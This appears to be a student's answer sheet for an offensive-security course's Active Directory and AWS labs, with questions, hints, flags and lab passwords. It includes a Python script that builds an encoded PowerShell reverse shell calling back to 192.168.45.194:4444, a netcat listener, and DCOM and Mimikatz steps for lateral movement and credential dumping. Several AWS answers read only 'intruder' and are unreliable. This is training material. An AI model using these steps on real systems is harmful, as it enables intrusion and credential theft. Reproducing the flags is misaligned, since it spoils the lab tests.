OS{6a514936cb4d49d4a05f1991382ee179}

View hints

no hints

Command

21.4.1. Collecting Data with SharpHound

Active Directory Enumeration - Collecting Data with SharpHound - VM Group 1

Labs
1. Start VM Group 1 and log in to CLIENT75 as stephanie. Gather the domain data with SharpHound as outlined in this
section. Which function can we use with SharpHound to see changes happening in the domain over a longer period of
time?

Answer

Loop

View hints

HINT

1. Reflect on the part of the section that discusses SharpHound’s ability to run repeated queries over a duration.
2. The answer is a synonym for continuous or repetitive action, typically used to describe a function that repeats in
a cycle.

Command

2. Which syntax in SharpHound allows us to set a password on the resulting .zip file?

Answer

ZipPassword

View hints

HINT

1. Refer to the SharpHound documentation, particularly the section detailing command-line arguments or syntax for
securing output files.
2. Look for a syntax option that is associated with securing or encrypting a zipped data file.

Command

How to get all the information from AD via the zip file

21.4.2. Analysing Data using BloodHound

Active Directory Enumeration - Bloodhound - VM Group 1

Active Directory Enumeration - Capstone - VM Group 2

Labs
1. If you have not collected data using SharpHound at this point, start VM Group 1 and perform the data collection.
Transfer the .zip file generated with SharpHound to Kali Linux. Start BloodHound and repeat the analysis steps outlined
in this section to find the promising attack path. Which service does BloodHound rely on to display the data in graphs?

Answer

Neo4j

View hints

HINT

Refer back to listing 80 in this section, which mentions a service used in conjunction with BloodHound.

Command

2. Search for the Management Department group in BloodHound and use the Node Info tab to have a look at
the Inbound Control Rights for the group. Who is currently the owner of the Management Department group?

Answer

DOMAIN ADMINS

View hints

HINT

1. Focus on finding the node that implies possession or ownership within the Inbound Control Rights.
2. The answer is a common name for a group that usually has wide-ranging administrative privileges across the
domain.

Command

3. Capstone Exercise: Start VM Group 2 and log in as stephanie to CLIENT75. From CLIENT75, enumerate the object
permissions for the domain users. Once weak permissions have been identified, use them to take full control over the
account and use it to log in to the domain. Once logged in, repeat the enumeration process using techniques shown in
this Module to obtain the flag.

Answer

OS{a23475b017b86442a14e6244f51ff8fb}

View hints

HINT

1. Bloodhound data might show Stephanie has a first-degree object control.
2. PowerView could also be used to find any exciting domain ACL Stephanie has.
3. Does the new user have local admin access?

Command

22. Attacking Active Directory Authentication
22.1.1. NTLM Authentication

Labs
1. What is the name of the cryptographic hash function a computer calculates from the user's password?

Answer

NTLM

View hints

HINT

1. Recall the first step in the password calculation process.
2. The answer is a four-letter acronym related to hashing.

Command

2. What kind of hashing algorithm is NTLM?

Answer

fast-hashing

View hints

HINT

1. Note the characteristics of NTLM regarding password cracking.
2. Identify the term describing NTLM's hashing speed & security.

Command

22.1.2. Kerberos Authentication

Labs
1. What is the name of the request sent when a user logs into their AD-joined machine?

Answer

AS-REQ

View hints

HINT

After reviewing figure 2 in this section, pay particular attention to the next paragraph.

Command

2. What is the main authentication protocol used by Active Directory?

Answer

Kerberos

View hints

no hints

Command

3. What is the short name of the request sent by the client that encrypts the TGT along with the current user, the target
resource, and the timestamp?

Answer

TGS-REQ

View hints

HINT

The Ticket Granting Service Request (TGS-REQ) packet consists of the current user and a timestamp encrypted
with the session key, the name of the resource, and the encrypted TGT.

Command

22.1.3. Cached AD Credentials

Attacking Active Directory Authentication - Cached AD Credentials - VM Group 1

Labs
1. Follow the steps outlined in this section to retrieve the cached NTLM hash. Furthermore, execute the dir command
and list the cached tickets. What is the Mimikatz command to dump hashes for all users logged on to the current
system?

Answer

sekurlsa::logonpasswords

View hints

HINT

1. Launch PowerShell command prompt with elevated privileges.
2. The command you seek is utilized for dumping logon passwords.
3. Use the command provided in listing 3 to dump all the credentials of all logged-on users.

Command

22.2.1. Password Attacks

Attacking Active Directory Authentication - Password Attacks - VM Group 1

Labs
1. Follow the steps outlined in this section and spray the password Nexus123! with the three different tools introduced
in this section. What is the minimum password length required in the target domain?

Answer

View hints

HINT

Use the command provided in listing 6 in order to find the minimum required password length of the domain.

Command

2. Spray the credentials of pete against all domain joined machines with crackmapexec. On which machine is pete a
local administrator?

Answer

CLIENT76

View hints

HINT

1. Refer to listing 12 to see what the output looks like when the credentials have administrative privileges.
2. You need to use "pete" as the user against all the target machines not "dave".

Command

22.2.2. AS-REP Roasting

Attacking Active Directory Authentication - AS-REP Roasting - VM Group 1

Attacking Active Directory Authentication - AS-REP Roasting - VM Group 2

Labs
1. Follow the steps outlined in this section to obtain the plaintext password of dave on Windows and Kali by performing
AS-REP Roasting. What is the correct Hashcat mode to crack AS-REP hashes?

Answer

18200

View hints

HINT

Refer to listing 15 to obtain the hashcat mode against AS-REP hashes.

Command

2. Once VM Group 2 is started, the domain corp.com has been slightly modified. Use the techniques from this section to
obtain another plaintext password by performing AS-REP Roasting and enter it as answer to this exercise.

Answer

Summerland1

View hints

HINT

Use the command provided in listing 14 to perform AS-REP Roasting and crack it as shown in listing 16.

Command

22.2.3. Kerberoasting

Attacking Active Directory Authentication - Kerberoasting - VM Group 1

Attacking Active Directory Authentication - Kerberoasting - VM Group 2

Labs
1. Follow the steps outlined in this section to obtain the plaintext password of iis_service on Windows and Kali by
performing Kerberoasting. What is the correct Hashcat mode to crack TGS-REP hashes?

Answer

13100

View hints

HINT

1. Make sure you are working on VM Group 1 to replicate the steps.
2. Refer to listing 20 to obtain the hashcat mode against TGS-REP hashes.

Command

2. Once VM Group 2 is started, the domain corp.com has been slightly modified. Use the techniques from this section to
obtain another plaintext password by performing Kerberoasting and enter it as answer to this exercise. To crack the
TGS-REP hash, create and utilize a rule file which adds a "1" to the passwords of rockyou.txt. To perform the attack,
you can use the user jeff with the password HenchmanPutridBonbon11.

Answer

MattLovesAutumn1

View hints

HINT

1. Use the command provided in listing 22 to perform Kerberoasting using jeff's hash, adjusting the third octet of the
IP based on your actual exercise VMs.
2. Once the hash has been retrieved, crack it with the command provided in listing 21.

Command

22.2.4. Silver Tickets

Attacking Active Directory Authentication - Silver Tickets - VM Group 1

Labs
1. Follow the steps outlined in this section to forge a silver ticket for jeffadmin in order to access the web page located
at http://web04. Review the source code of the page and find the flag.

Answer

OS{806a8b81b899c9db199c265ce145deee}

View hints

HINT

1. Log in to the CLIENT75 (192.168.x.75) machine as the jeff user with xfreerdp.
2. Follow the steps in this learning unit.
3. To quickly find the flag, append "| findstr /i OS{" to the command in listing 29.

Command

22.2.5. Domain Controller Synchronization

Attacking Active Directory Authentication - Domain Controller Synchronization - VM Group 1

Attacking Active Directory Authentication - VM Group 2

Attacking Active Directory Authentication - VM Group 3

Labs
1. Follow the steps outlined in this section to perform the dcsync attack to obtain the NTLM hash of the krbtgt account.
Enter the NTLM hash as answer to this question.

Answer

1693c6cefafffc7af11ef34d1c788f47

View hints

HINT

1. Ensure that you are working on VM Group 1 to replicate the steps.
2. Use the command provided in listing 30 to perform the dcsync attack. However, in this specific exercise, our target
is the hash of the krbtgt account (corp\krbtgt).

Command

2. Capstone Exercise: Once VM Group 2 is started, the domain corp.com has been modified. Use the techniques from
this Module to obtain access to the user account maria and log in to the domain controller. To perform the initial
enumeration steps you can use pete with the password Nexus123!. You'll find the flag on the Desktop of the domain
administrator on DC1. If you obtain a hash to crack, create and utilize a rule file which adds nothing, a "1", or a "!" to the
passwords of rockyou.txt.

Answer

OS{a3b928627281409369cc404a8c4668a8}

View hints

HINT

1. Perform credential roasting on specific users within the DC.
2. Crack the hash using a custom rule with hashcat.
3. Spray the new credential across all machines using crackmapexec.
4. Use mimikatz to perform post-exploitation and try logging into DC1.

Command

3. Capstone Exercise: Once VM Group 3 is started, the domain corp.com has been modified. By examining leaked
password database sites, you discovered that the password VimForPowerShell123! was previously used by a domain
user. Spray this password against the domain users meg and backupuser. Once you have identified a valid set of
credentials, use the techniques from this Module to obtain access to the domain controller. You'll find the flag on the
Desktop of the domain administrator on DC1. If you obtain a hash to crack, reuse the rule file from the previous exercise.

Answer

OS{75e553ca010d5cac792e30d7921b5459}

View hints

HINT

1. Spray the given password with crackmapexec until we find a valid domain user.
2. Once a valid login is found, look for SPNs using impacket's "GetUserSPNs.py".
3. Crack the hash using the same rule in the previous exercise.

Command

23. Lateral Movement in Active Directory
23.1.1. WMI and WinRM

Lateral Movement in Active Directory - WMI and WinRM - VM Group 1

Lateral Movement in Active Directory - WMI and WinRM - VM Group 2

Labs
1. Launch VM Group 1 and repeat the steps discussed in this section. Which PowerShell cmdlet has been used to create
a WMI session?

Answer

New-Cimsession

View hints

HINT

1. Please refer to the paragraph right after listing 2 and listing 3 in this section to create a WMI session.
2. The answer does not contain any underscore.

Command

2. Launch VM Group 2 and, once connected as jeff on client74, try to move laterally to web04 in order to get the flag
located on the administrator's desktop.

Answer

OS{a81e858888f680e8b459e5915889ce93}

View hints
HINT

1. RDP to CLIENT74 as jeff using the password provided in the training library after powering up VM Group 2.
2. Follow the same steps outlined in listing 6 and listing 8, but keep in mind that this time, the objective is to gain
access to WEB04.

Command

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.194",4444);$stream = $client.GetStre

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

23.1.2. PsExec

Lateral Movement in Active Directory - PsExec - VM Group 1

Lateral Movement in Active Directory - PsExec - VM Group 2

Labs
1. Start VM Group 1 and repeat the steps discussed in this section. Which system folder (that will become a share name)
needs to be shared in order for PsExec to connect remotely?

Answer

ADMIN$

View hints

HINT

1. At the start of this learning unit, it's specified which system folder needs to be accessed. Note: When
reproducing the steps, you should avoid using the domain flag (-d) for RDP, as the user has local admin
privileges in this scenario.

Command

2. Start VM Group 2 and connect as the offsec user on client74. Then try to use PsExec to move laterally to web04 in
order to get the flag located on jen's desktop.

Answer

OS{026f5adfcdec25c1dae329fbf5261c9c}

View hints

HINT

1. RDP to Client74 as the offsec user, a local administrator, using the password provided in the training library.
2. Use jen's credentials and the command provided in listing 15 to access web04, not FILES04.

Command

23.1.3. Pass the Hash

Lateral Movement in Active Directory - Pass the Hash - VM Group 1

Lateral Movement in Active Directory - Pass the Hash - VM Group 2

Labs
1. Start VM Group 1 and repeat the steps discussed in this section. Which TCP port needs to be enabled on the target
machine in order for the pass the hash technique to work?

Answer

445

View hints

HINT

Similar to PsExec, this technique requires an SMB connection through the firewall and the Windows File and Printer
Sharing feature to be enabled.

Command

2. Start VM Group 2 and try to execute the pass the hash technique to move laterally to web04 to get the flag located on
the administrator's desktop.

Answer
OS{47b670d16f08da715ac2bb9cde3d5b3e}

View hints

HINT

In this exercise, remember that we need to gain access to WEB04. Use the same hash provided in listing 16 in this
learning unit.

Command

23.1.4. Overpass the Hash

Lateral Movement in Active Directory - Overpass the Hash - VM Group 1

Lateral Movement in Active Directory - Overpass the Hash - VM Group 2

Labs
1. Start VM Group 1 and repeat the steps discussed in this section. Which command is used to inspect the current TGT
available for the running user?

Answer

klist

View hints

HINT

1. While repeating the steps in this learning unit, remember to simulate the cached credential scenario as shown.
2. Review the command used in listing 19 to answer this question.



Command

2. Start VM Group 2 and try to execute the overpass the hash technique to move laterally to web04 to get the flag
located on the Administrator's desktop. To do so, connect to CLIENT76 via RDP as the offsec user and use the NTLM
hash obtained in a previous Module.

Answer

OS{366ef933917c418c5e9a40da47182a98}

View hints

HINT

1. Administrator's NTLM hash was provided in listing 16 in the "Pass The Hash" learning unit.
2. Ensure that you execute PowerShell with administrative privileges. Note: You can find all the necessary tools in
the C:\tools directory.

Command



After these commands, a PowerShell prompt on web04 opens.



23.1.5. Pass the Ticket

Lateral Movement in Active Directory - Pass the Ticket - VM Group 1

Labs
1. Start VM Group 1 and try to execute the pass the ticket technique as illustrated in this section by first logging in to
CLIENT76 as jen. Try to move laterally to web04 to get the flag located in the shared folder.

Answer

OS{8b19d69d079958915e201e2858751ec6}

View hints

HINT

1. RDP to CLIENT76 as the jen user.
2. Follow the steps outlined in this learning unit.
3. You can use the command provided in listing 28 to list the content in the share. To read the flag, use the 'type'
command.

Command

23.1.6. DCOM

Lateral Movement in Active Directory - DCOM - VM Group 1

Lateral Movement in Active Directory - DCOM - VM Group 2

Labs
1. Start VM Group 1 and repeat the steps discussed in this section. Which MMC method accepts command shell
arguments?

Answer
ExecuteShellCommand

View hints

HINT


You may want to review Ref Link #9 to recall the method used in the course.

Command

2. Start VM Group 2 and connect as the jen user on client74, then try to abuse DCOM to move laterally to web04 to get
the flag located on the administrator's desktop.

Answer

OS{50d49f4d49aa3413c2dbf80398fdc894}

View hints

HINT

Use the encoded PS command similar to what we did in the WMI and WinRM section earlier in this Module and add
a reverse-shell as a DCOM payload.

Command

1. Start VM Group 2 and log in to CLIENT74 as the jen user.

2. Prepare the Reverse Shell:

Use a Python script to generate a base64 encoded PowerShell command for a reverse shell. The command
should look something like this:

powershell -nop -w hidden -e <base64_encoded_command>

Replace <base64_encoded_command> with your actual encoded command.

encode.py


3. Set Up a Listener:

On your Kali machine, set up a Netcat listener on the port you plan to use (e.g., port 443):

nc -lnvp 443

4. Instantiate the DCOM Object:

In an elevated PowerShell prompt on CLIENT74, run the following command to create a DCOM object
targeting WEB04:

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<WEB04_IP>"))

Replace <WEB04_IP> with the actual IP address of WEB04.

5. Execute the Reverse Shell Command:

Use the ExecuteShellCommand method to run your encoded PowerShell command:

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"<your_encoded_command>","7")

Replace <your_encoded_command> with the base64 encoded command you generated earlier.

6. Verify the Connection:

Check your Netcat listener on Kali to confirm that you have received a connection from WEB04.

7. Access the Flag:

Once you have a reverse shell, navigate to the administrator's desktop on WEB04 and retrieve the flag.


23.2.1. Golden Ticket

Lateral Movement in Active Directory - Golden Ticket - VM Group 1

Lateral Movement in Active Directory - Golden Ticket - VM Group 2

Labs
1. Start VM Group 1 and repeat the steps discussed in this section. Which user's NTLM hash do we need to abuse in
order to forge a golden ticket?

Answer

krbtgt

View hints

HINT

Follow the steps in this learning unit. All necessary tools are located in the C:\Tools directory. Obtaining the krbtgt
password hash grants the ability to generate custom TGTs, often referred to as "golden tickets".

Command

2. Start VM Group 2 and try to execute the golden ticket persistence technique to get access to DC1 and get the flag
located on the administrator's desktop.

Answer

OS{cadeccd38a6337371e1f2d25c0f071d9}

View hints

HINT

1. RDP to client74 with the provided credentials, ensure that you specify the domain.
2. Reuse the krbtgt hash from the courseware.

Command

23.2.2. Shadow Copies

Lateral Movement in Active Directory - Shadow Copies and Domain Sync - VM Group 1

Lateral Movement in Active Directory - Shadow Copies and Domain Sync - VM Group 2

Lateral Movement in Active Directory - Capstone - VM Group 3

Lateral Movement in Active Directory - Capstone - VM Group 4

Labs
1. Start VM Group 1 and repeat the steps discussed in this section. During a shadow copy operation, what is the
designated name for the source location from which the ntds.dit is copied?

Answer

Shadow copy device name

View hints

HINT

1. Carefully review Listing 41, paying close attention to the text highlighted in red.

Command


2. Capstone Exercise: Start VM Group 2 and try to execute the dcsync technique and get access to dc1 in order to get
the flag located on the administrator's desktop. To do so, log in via RDP as the jeffadmin and perform dcsync against
the domain Administrator user to obtain its NTLM hash.

Answer

OS{05827e0b03cd7d09890312a55a13416d}

View hints
HINT

1. You can find all the necessary tools such as mimikatz, Sysinternals in the C:\tools directory.
2. If mimikatz throws an error, it is beneficial to research the meaning of the error.
3. You may utilize impacket tools to get access to DC.

Command


3. Capstone Exercise: Once VM Group 3 is started, the domain corp.com has been modified. Log in as leon on
CLIENT74 and use the techniques discussed in this Module to move laterally and get the flag on FILES04
Administrator's desktop.

Answer

OS{09c691018ce88b2a16a7e0cc8e2aab31}

View hints

HINT

1. Once logged into CLIENT74, you are expected to figure out current users' groups and privileges.
2. Consider spraying the current user's credentials across the network to identify any potentially useful outcomes.

Command

4. Capstone Exercise: Once VM Group 4 is started, the domain corp.com has been modified. Log in as the leon user on
CLIENT76 and use the techniques discussed in this Module to move laterally and get the flag in the WEB04 shared
folder.

Answer

OS{c29c8b82bf8420396e1fc0e692cebecc}

View hints

HINT

1. Log into CLIENT76 and assess the current user's privileges for administrator rights.
2. Review potential actions for lateral movement with the provided user.
3. To access the shared folder, leverage any cached hashes or tickets to your advantage.

Command

24. Enumerating AWS Cloud Infrastructure
24.2.2. Domain and Subdomain Reconnaissance

Labs
1. What command is used to query the authoritative DNS servers for the domain offseclab.io?

A) host -t ns offseclab.io

B) whois offseclab.io

C) dig offseclab.io

D) nslookup offseclab.io

Answer

View hints

no hints


Command

2. Which AWS service is very likely being used to manage the offseclab.io domain?

A) Amazon S3

B) Amazon EC2

C) Amazon Route 53

D) Amazon RDS

Answer

View hints

no hints

Command

3. Find the proof while gathering more info about the domain inside other commonly used DNS records.

Answer

OS{5423b7bd5cd992932326a72a647d2f57}

View hints

HINT

The proof is inside a record that is used to identify mail servers that are allowed to send emails on that domain.

Command

24.2.3. Service-specific Domains

Labs
1. What does the XML response indicate when received after removing the object key from the S3 URL?

A) The bucket does not exist
B) The bucket is publicly accessible and lists its contents
C) The bucket is fully private
D) The bucket is hosted on Azure

Answer

intruder

View hints

no hints

Command

no commands

2. Which custom URL is used by AWS for storing objects in S3 buckets?

A) azurewebsites.net
B) s3.amazonaws.com
C) storage.googleapis.com
D) web.core.windows.net

Answer

intruder


View hints

no hints

Command

no commands

3. Use the concepts we've learned to find other S3 buckets. We may want to build a dictionary around gemstones'
names as it is the theme that the target uses to name the projects. Assume that the format follows the
pattern offseclab-[gemstone]-[lab_assigned_random_value]. The proof resides in an object named proof.txt.

Answer

intruder

View hints

no hints

Command

no commands


Challenge Labs
